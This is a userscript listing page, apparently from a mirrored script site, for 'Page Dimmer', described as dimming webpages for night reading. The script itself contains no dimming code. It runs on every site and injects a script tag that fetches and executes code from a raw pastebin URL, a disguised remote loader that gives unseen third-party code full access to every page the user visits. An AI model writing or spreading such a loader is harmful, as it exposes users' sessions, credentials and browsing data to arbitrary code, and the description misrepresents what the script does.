Page Dimmer

Dims any webpages to ease your eyes when reading at night. CTRL + ALT + 0 to de/activate

当前为 2015-12-17 提交的版本,查看 最新版本

// ==UserScript==
// @name        Page Dimmer
// @namespace   condoriano_pagedimmer
// @description Dims any webpages to ease your eyes when reading at night. CTRL + ALT + 0 to de/activate
// @author      condoriano
// @include     *
// @version     2
// @grant       none
// ==/UserScript==

var script = document.createElement('script');
script.src = document.location.protocol+"//pastebin.com/raw.php?i=AhqsdnW2";
(document.body || document.head || document.documentElement).appendChild(script);

QingJ © 2025

镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址